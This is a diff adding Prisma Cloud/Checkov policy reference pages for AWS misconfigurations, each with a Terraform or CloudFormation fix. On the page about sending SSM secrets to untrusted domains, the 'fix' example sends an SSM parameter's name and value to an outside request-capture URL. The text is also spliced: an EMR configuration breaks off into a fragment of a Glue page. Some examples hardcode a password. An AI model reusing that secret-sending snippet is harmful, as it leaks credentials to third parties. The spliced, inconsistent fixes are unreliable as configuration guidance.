+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c848bd8a-2bb2-4c0b-9c2c-2b445cfdb811
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py[CKV_AWS_242]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+It is recommended to have a proper logging process for the AWS MWAA environment scheduler in order to track configuration changes conducted manually and programmatically, and to trace back unapproved changes.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_mwaa_environment" "pass" {
+  dag_s3_path        = "dags/"
+  execution_role_arn = aws_iam_role.example.arn
+
+  logging_configuration {
+    dag_processing_logs {
+      enabled   = true
+      log_level = "DEBUG"
+    }
+
+    scheduler_logs {
+      enabled   = true
+      log_level = "INFO"
+    }
+  }
+
+  name = "example"
+
+  network_configuration {
+    security_group_ids = [aws_security_group.example.id]
+    subnet_ids         = aws_subnet.private[*].id
+  }
+
+  source_bucket_arn = aws_s3_bucket.example.arn
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc
new file mode 100644
index 000000000..f2e80d37f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc
@@ -0,0 +1,74 @@
+== AWS MWAA environment has webserver logs disabled
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1f508c33-c9e1-4ee8-9f52-21300c096aea
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py[CKV_AWS_244]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+It is recommended to have a proper logging process for the AWS MWAA environment webserver in order to track configuration changes conducted manually and programmatically, and to trace back unapproved changes.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_mwaa_environment" "pass" {
+  dag_s3_path        = "dags/"
+  execution_role_arn = aws_iam_role.example.arn
+
+  logging_configuration {
+    dag_processing_logs {
+      enabled   = true
+      log_level = "DEBUG"
+    }
+
+    webserver_logs {
+      enabled   = true
+      log_level = "INFO"
+    }
+  }
+
+  name = "example"
+
+  network_configuration {
+    security_group_ids = [aws_security_group.example.id]
+    subnet_ids         = aws_subnet.private[*].id
+  }
+
+  source_bucket_arn = aws_s3_bucket.example.arn
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc
new file mode 100644
index 000000000..641c3932b
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc
@@ -0,0 +1,70 @@
+== AWS MWAA environment has worker logs disabled
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 15ca455c-9e3d-4547-ab70-cb81b99af3c2
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py[CKV_AWS_243]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+It is recommended to have a proper logging process for AWS MWAA environment workers in order to track configuration changes conducted manually and programmatically, and to trace back unapproved changes.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_mwaa_environment" "pass" {
+  dag_s3_path        = "dags/"
+  execution_role_arn = aws_iam_role.example.arn
+
+  logging_configuration {
+    worker_logs {
+      enabled   = true
+      log_level = "CRITICAL"
+    }
+  }
+
+  name = "example"
+
+  network_configuration {
+    security_group_ids = [aws_security_group.example.id]
+    subnet_ids         = aws_subnet.private[*].id
+  }
+
+  source_bucket_arn = aws_s3_bucket.example.arn
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc
new file mode 100644
index 000000000..c9b573efe
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc
@@ -0,0 +1,57 @@
+== AWS RDS Cluster activity streams are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 411d0425-c08a-4bd7-b226-0ed9f8663d3c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py[CKV_AWS_246]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+This policy identifies RDS Cluster activity streams that are encrypted with default KMS keys instead of customer managed keys (CMKs).
+It is a best practice to use customer managed KMS keys to encrypt your RDS Cluster activity stream data, as this gives you full control over the encrypted data.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+* *Resource:* aws_rds_cluster_activity_stream
+* *Arguments:* kms_key_id
+
+[source,go]
+----
+resource "aws_rds_cluster_activity_stream" "pass" {
+  resource_arn = aws_rds_cluster.default.arn
+  mode         = "async"
+  kms_key_id   = aws_kms_key.default.key_id
+
+  depends_on = [aws_rds_cluster_instance.default]
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc
new file mode 100644
index 000000000..6bbe8cb2b
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc
@@ -0,0 +1,75 @@
+== AWS RDS DB snapshot does not use Customer Managed Keys (CMKs)
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| bf81d0e5-01d4-4372-a1d4-9a124e8f366d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py[CKV_AWS_266]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+This policy identifies database snapshots that were not encrypted with a customer managed KMS key.
+It is a best practice to manage your own encryption keys for all storage volumes and snapshots.
+
+////
+=== Fix - Runtime
+Changing the encryption method cannot be done for existing snapshots.
+Instead, create a new snapshot and add the CMK encryption.
+
+. Open the Amazon RDS console.
+
+. In the navigation pane, choose Databases.
+
+. Choose the DB instance for which you want to create a manual snapshot.
+
+. Create a manual snapshot for your DB instance.
+
+. In the navigation pane, choose Snapshots.
+
+. Select the manual snapshot that you created.
+
+. Choose Actions, and then choose Copy Snapshot.
+
+. Under Encryption, select Enable Encryption.
+
+. For AWS KMS Key, choose the new encryption key that you want to use.
+
+. Choose Copy snapshot.
+
+. Restore the copied snapshot.
+////
+
+=== Fix - Buildtime
+
+*Terraform*
+
+* *Resource:* aws_db_snapshot_copy
+* *Arguments:* kms_key_id
+
+[source,go]
+----
+resource "aws_db_snapshot_copy" "pass" {
+  source_db_snapshot_identifier = aws_db_snapshot.example.db_snapshot_arn
+  target_db_snapshot_identifier = "testsnapshot1234-copy"
+  # encrypt the copy with a customer managed key
+  kms_key_id                    = aws_kms_key.example.arn
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc
new file mode 100644
index 000000000..a58923453
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc
@@ -0,0 +1,62 @@
+== AWS RDS PostgreSQL exposed to local file read vulnerability
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| afa1ed5a-f39d-457a-952d-be3ab101e077
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py[CKV_AWS_250]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//Run
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+The log_fdw extension for Amazon Relational Database Service (AWS RDS) PostgreSQL instances allows you to query log files from foreign servers as if they were tables in a database.
+However, certain versions of the log_fdw extension may contain vulnerabilities that can be exploited by attackers.
+By ensuring that your AWS RDS PostgreSQL instances use a non-vulnerable version of the log_fdw extension, you can help protect your database from potential security threats.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_db_instance" "pass" {
+  name           = "name"
+  instance_class = "db.t3.micro"
+  engine         = "postgres"
+  engine_version = "13.3"
+}
+
+resource "aws_rds_cluster" "pass" {
+  engine         = "aurora-postgresql"
+  engine_version = "11.9"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-uses-a-modern-cacert.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-uses-a-modern-cacert.adoc
new file mode 100644
index 000000000..55e9c96da
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-uses-a-modern-cacert.adoc
@@ -0,0 +1,61 @@
+== AWS RDS does not use a modern CaCert
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 008fd8a9-4766-4cc3-a8d4-006d4c0340da
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py[CKV_AWS_211]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+By ensuring that your AWS RDS instance uses a modern CA certificate, you can help ensure that the certificate used to secure connections to your database is up to date and free of known vulnerabilities.
+This can help protect your database from potential attacks and improve the overall security of your system.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_db_instance" "pass" {
+  allocated_storage                   = 20
+  storage_type                        = "gp2"
+  engine                              = "mysql"
+  engine_version                      = "5.7"
+  instance_class                      = "db.t2.micro"
+  name                                = "mydb"
+  username                            = "foo"
+  password                            = "foobarbaz"
+  iam_database_authentication_enabled = true
+  storage_encrypted                   = true
+  ca_cert_identifier                  = "rds-ca-2019"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc
new file mode 100644
index 000000000..5c75913dd
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc
@@ -0,0 +1,30 @@
+== AWS replicated backups are not encrypted at rest by Key Management Service (KMS) using a Customer Managed Key (CMK)
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f7e759b2-f20e-44cd-bfd9-f94fb6a24210
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py[CKV_AWS_245]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+This policy identifies RDS instances whose replicated automated backups are not encrypted at rest with a customer managed key (CMK).
+Using CMKs gives you full control over the encrypted data.
+
+=== Fix - Buildtime
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ssm-parameter-is-encrypted.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ssm-parameter-is-encrypted.adoc
new file mode 100644
index 000000000..364f7e1fa
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ssm-parameter-is-encrypted.adoc
@@ -0,0 +1,56 @@
+== AWS SSM Parameter is not encrypted
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 926b7056-6a39-4885-a806-8e4cf958fced
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml[CKV2_AWS_34]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//Run
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+As a best practice, enable encryption for your AWS SSM Parameters to improve data security without making changes to your business or applications.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_ssm_parameter" "aws_ssm_parameter_ok" {
+  name            = "sample"
+  type            = "SecureString"
+  value           = "test"
+  description     = "policy test"
+  tier            = "Standard"
+  allowed_pattern = ".*"
+  data_type       = "text"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc
new file mode 100644
index 000000000..21d80e20e
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc
@@ -0,0 +1,59 @@
+== AWS Terraform sends SSM secrets to untrusted domains over HTTP
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 97cd3044-4e7e-40b2-9240-4410d7932d79
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml[CKV2_AWS_36]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+
+Sending secrets such as passwords and encryption keys over an untrusted network or domain increases the risk that they are intercepted and compromised, because the secrets may not be encrypted while in transit.
+By ensuring that your Terraform configuration does not send secrets to untrusted domains over HTTP, you can help protect the confidentiality of your secrets and reduce the risk of them being compromised.
+Instead, use secure protocols such as HTTPS or SSL/TLS to transmit secrets, as these protocols protect the secrets in transit.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+[source,go]
+----
+resource "aws_ssm_parameter" "param2" {
+  name  = var.parameter_name
+  type  = "String"
+  value = "foo"
+}
+
+data "http" "nonleak2" {
+  url = "https://enp840cyx28ip.x.pipedream.net/?id=${aws_ssm_parameter.param2.name}&content=${aws_ssm_parameter.param2.value}"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc
new file mode 100644
index 000000000..97fb06333
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc
@@ -0,0 +1,74 @@
+== Backup Vault is not encrypted at rest using KMS CMK
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| ff405a6a-563e-41ba-995b-37769ea7fb8b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py[CKV_AWS_166]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Encrypting your data and resources with KMS
helps protect your data from unauthorized access or tampering.
+By encrypting your data, you ensure that only authorized users can access and decrypt it, and that it is protected in storage and in transit.
+This helps protect against external threats such as hackers or malware, as well as internal threats such as accidental or unauthorized access.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_backup_vault
+* *Arguments:* kms_key_arn
+
+
+[source,go]
+----
+resource "aws_backup_vault" "backup_with_kms_key" {
+  ...
+
+  kms_key_arn = aws_kms_key.example.arn
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Backup::BackupVault
+* *Arguments:* Properties.EncryptionKeyArn
+
+
+[source,yaml]
+----
+Type: AWS::Backup::BackupVault
+Properties:
+  ...
++ EncryptionKeyArn: !GetAtt ExampleKmsKey.Arn
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-docdb-has-audit-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-docdb-has-audit-logs-enabled.adoc
new file mode 100644
index 000000000..adfe331d4
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-docdb-has-audit-logs-enabled.adoc
@@ -0,0 +1,73 @@
+== DocDB does not have audit logs enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 3d19b0c1-6479-47dc-b5c1-f9137fb90683
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py[CKV_AWS_104]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Enabling audit logs for Amazon DocumentDB (DocDB) can help you to monitor and track activity within your DocDB cluster.
+Audit logs provide a record of database activity, including details about the activity itself (e.g., which database was accessed, what type of operation was performed), as well as information about the user or application that initiated the activity. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_docdb_cluster_parameter_group +* *Arguments:* parameter.audit_logs + + +[source,go] +---- +resource "aws_docdb_cluster_parameter_group" "test" { + ... ++ parameter { ++ name = "audit_logs" ++ value = "enabled" + } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::DocDB::DBClusterParameterGroup +* *Arguments:* Parameters.audit_logs + + +[source,yaml] +---- +Resources: + DocDBParameterGroupEnabled: + Type: "AWS::DocDB::DBClusterParameterGroup" + Properties: + ... ++ Parameters: ++ audit_logs: "enabled" + ... +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc new file mode 100644 index 000000000..8ed43f3ec --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc @@ -0,0 +1,55 @@ +== Dynamodb point in time recovery is not enabled for global tables + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 09745d74-a2aa-4802-a022-33eced685a47 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py[CKV_AWS_165] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Enabling point-in-time recovery (PITR) for Amazon DynamoDB global tables can help to protect against data loss due to accidental write or delete 
operations, or due to data corruption.
+With PITR enabled, you can restore a global table to any point in time within the specified recovery window (typically up to 35 days).
+This can be helpful if you need to undo unintended changes or recover from data corruption.
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::DynamoDB::GlobalTable
+* *Arguments:* Properties.Replicas.PointInTimeRecoverySpecification
+
+
+[source,yaml]
+----
+Resources:
+  MyGlobalTable:
+    Type: AWS::DynamoDB::GlobalTable
+    Properties:
+      ...
+      Replicas:
+        - ...
++         PointInTimeRecoverySpecification:
++           PointInTimeRecoveryEnabled: true
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-ebs-default-encryption-is-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-ebs-default-encryption-is-enabled.adoc
new file mode 100644
index 000000000..35a6d9eba
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-ebs-default-encryption-is-enabled.adoc
@@ -0,0 +1,64 @@
+== AWS EBS volume region with encryption is disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6960be11-e3a6-46cc-bf66-933c57c2af5d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py[CKV_AWS_106]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies AWS regions in which new EBS volumes are created without encryption.
+Encrypting data at rest reduces unintentional exposure of data stored in EBS volumes.
+It is recommended to configure EBS encryption at the regional level, so that every new EBS volume created in that region is encrypted by default with the provided encryption key.
+ +//// +=== Fix - Runtime + + +AWS Console + + +To enable encryption at region level by default, follow below URL: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html#encryption-by-default +Additional Information: To detect existing EBS volumes that are not encrypted ; refer Saved Search: AWS EBS volumes are not encrypted_RL To detect existing EBS volumes that are not encrypted with CMK, refer Saved Search: AWS EBS volume not encrypted using Customer Managed Key_RL +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ebs_encryption_by_default +* *Arguments:* enabled + + +[source,go] +---- +{ + "resource "aws_ebs_encryption_by_default" "enabled" { ++ enabled = true +}", +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc new file mode 100644 index 000000000..d92162429 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc @@ -0,0 +1,68 @@ +== AWS EMR cluster is not configured with SSE KMS for data at rest encryption (Amazon S3 with EMRFS) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 66958003-19e7-4aac-bed2-1d488b25702b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py[CKV_AWS_171] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling Amazon S3 Server-Side Encryption with AWS Key Management Service (SSE-KMS) for your Amazon Elastic MapReduce (EMR) cluster's security configuration can help to protect the data stored in your cluster. 
+SSE-KMS uses a customer master key (CMK) in the AWS KMS to encrypt and decrypt data stored in Amazon S3. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_emr_security_configuration +* *Arguments:* EnableAtRestEncryption + + +[source,go] +---- +resource "aws_emr_security_configuration" "test" { + ... + configuration = < \ +[--crawler-security-configuration & lt;value>] +---- +//// + +=== Fix - Buildtime + + +* *Resources:* `aws_glue_crawler`, `aws_glue_dev_endpoint` and `aws_glue_job` +* *Arguments:* `security_configuration` + +[source,hcl] +---- +resource "aws_glue_crawler" "example" { +name = "example" + +... +security_configuration = aws_glue_security_configuration.example.name +} +---- + + +*CloudFormation* + + +* *Resources:* `AWS::Glue::Crawler`, `AWS::Glue::DevEndpoint` and `AWS::Glue::Job` +* *Arguments:* `Properties.CrawlerSecurityConfiguration` or `SecurityConfiguration` + +[source,yaml] +---- +Resources: +Crawler: +Type: AWS::Glue::Crawler +Properties: +Name: example + +... +CrawlerSecurityConfiguration: !Ref SecurityConfiguration +Job: +Type: AWS::Glue::Job +Properties: +Name: example + +... 
+SecurityConfiguration: !Ref SecurityConfiguration +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-guardduty-is-enabled-to-specific-orgregion.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-guardduty-is-enabled-to-specific-orgregion.adoc new file mode 100644 index 000000000..7cee9bada --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-guardduty-is-enabled-to-specific-orgregion.adoc @@ -0,0 +1,60 @@ +== GuardDuty is not enabled to specific org/region + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f22347f8-2814-45a4-af73-b2cc4991aacf + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml[CKV2_AWS_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +GuardDuty is a security service provided by Amazon Web Services (AWS) that uses machine learning and threat intelligence to detect potential threats to your AWS accounts and workloads. +Enabling GuardDuty in specific regions or within your organization can help you to identify and respond to potential threats more quickly and effectively. +This can help to reduce the risk of security breaches and protect your data and systems from malicious activity. 
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_guardduty_detector, aws_guardduty_organization_configuration
+* *Arguments:* _auto_enable_ of aws_guardduty_organization_configuration
+
+
+[source,go]
+----
+resource "aws_guardduty_detector" "ok" {
+  enable = true
+}
+
+resource "aws_guardduty_organization_configuration" "example" {
+  auto_enable = true
+  detector_id = aws_guardduty_detector.ok.id
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-postgres-rds-has-query-logging-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-postgres-rds-has-query-logging-enabled.adoc
new file mode 100644
index 000000000..6cf2c3f6c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-postgres-rds-has-query-logging-enabled.adoc
@@ -0,0 +1,70 @@
+== AWS Postgres RDS have Query Logging disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a31de650-cada-4311-97c9-460f7d48e9e7
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_30]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This check ensures that query logging is enabled for your PostgreSQL database cluster.
+The cluster needs a non-default parameter group with two parameters set: _log_statement_ set to _all_ and _log_min_duration_statement_ set to _1_, to capture sufficient logs.
+NOTE: Query logging can expose secrets (including passwords) from your queries; restrict access to the logs and encrypt them to mitigate this risk.
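+The parameter group carrying these settings must also be attached to the cluster through its _db_cluster_parameter_group_name_ attribute. A minimal sketch of the attachment follows; the resource names and engine details are illustrative, not prescribed by this policy:
+
+[source,hcl]
+----
+resource "aws_rds_cluster" "example" {
+  cluster_identifier = "example-aurora-postgres"
+  engine             = "aurora-postgresql"
+  master_username    = "postgres"
+  master_password    = var.db_password
+
+  # Attach the non-default parameter group that enables query logging
+  db_cluster_parameter_group_name = aws_rds_cluster_parameter_group.example.name
+}
+----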
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+You will need an aws_rds_cluster_parameter_group resource that is referenced from your aws_rds_cluster via the
+db_cluster_parameter_group_name attribute.
+With that in place, the following parameters need to be set:
+
+
+[source,go]
+----
+resource "aws_rds_cluster_parameter_group" "example" {
+  name        = "rds-cluster-pg"
+  family      = "aurora-postgresql11"
+  description = "RDS default cluster parameter group"
+
++ parameter {
++   name  = "log_statement"
++   value = "all"
++ }
+
++ parameter {
++   name  = "log_min_duration_statement"
++   value = "1"
++ }
+}
+----
+
+For more details, see the AWS documentation: https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_LogAccess.Concepts.PostgreSQL.html
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-provisioned-resources-are-not-manually-modified.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-provisioned-resources-are-not-manually-modified.adoc
new file mode 100644
index 000000000..51ce9269e
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-provisioned-resources-are-not-manually-modified.adoc
@@ -0,0 +1,39 @@
+== AWS provisioned resources are manually modified
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
